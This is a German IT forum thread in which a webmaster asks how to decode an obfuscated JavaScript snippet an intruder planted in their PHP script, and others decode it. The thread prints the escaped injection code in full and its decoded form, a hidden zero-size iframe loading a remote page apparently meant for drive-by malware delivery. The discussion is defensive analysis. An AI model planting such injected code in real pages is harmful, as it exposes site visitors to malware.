Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Was bedeutet das bzw. was kann ich bei sowas lesbar machen

Frage Entwicklung JavaScript

Mitglied: 35801

35801 (Level 1)

08.04.2009, aktualisiert 13.05.2009, 4786 Aufrufe, 9 Kommentare

Ich habe ein einer meiner PHP Scripte folgendes gefunden...
01.
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
Mitglied: Woolfsmann
08.04.2009 um 14:08 Uhr
Hi,

nach einer kurzen google suche komm denke ich das hier hilft dir.

http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687

gruß
Woolfsmann
Bitte warten ..
Mitglied: 35801
08.04.2009 um 14:15 Uhr
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??

Ich müsste wissen was das macht.
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 14:41 Uhr
Hi,

Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:
01.
<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe>
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.

lg,
Slainte
Bitte warten ..
Mitglied: 35801
08.04.2009 um 15:54 Uhr
OK Danke!

Aber wie hast du das decodiert?

Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Bitte warten ..
Mitglied: miniversum
08.04.2009 um 16:09 Uhr
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit
<iframe src=

miniversum
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 16:11 Uhr
oder Du ersetzt das "document.write" einfach durch ein "alert"
Bitte warten ..
Mitglied: Biber
08.04.2009 um 16:17 Uhr
Moin diaz1983,

diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.

Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:

\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.

Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:18 Uhr
Hab noch ne nette Methode gefunden...

Zumindest mit Python ging das ganz einfach auf meinem Fedora-System

01.
[peter@fedoraPC ~]# python 
02.
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38)  
03.
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2 
04.
Type "help", "copyright", "credits" or "license" for more information. 
05.
 
06.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e" 
07.
<iframe  src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:21 Uhr
OK Danke...

Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Bitte warten ..
Ähnliche Inhalte
Grafikkarten & Monitore
Wie schliesst man ein RGB Kabel an und wo gibt es sowas noch? (20)

Frage von winIT3264 zum Thema Grafikkarten & Monitore ...

LAN, WAN, Wireless
WLAN nur temporär verfügbar machen (1)

Frage von pmqdesousa zum Thema LAN, WAN, Wireless ...

Neue Wissensbeiträge
Heiß diskutierte Inhalte
iOS
16 iPads zentrall verwalten (16)

Frage von simonlohr zum Thema iOS ...

Viren und Trojaner
Ransomware .nm4 (15)

Frage von Zyklo92 zum Thema Viren und Trojaner ...

Zusammenarbeit
Administrator Verhalten nach Vertragskündigung (13)

Frage von sysbone zum Thema Zusammenarbeit ...

Microsoft Office
gelöst VBA Excel Problem mit UserForm, ListBox und TextBox (12)

Frage von abuelito zum Thema Microsoft Office ...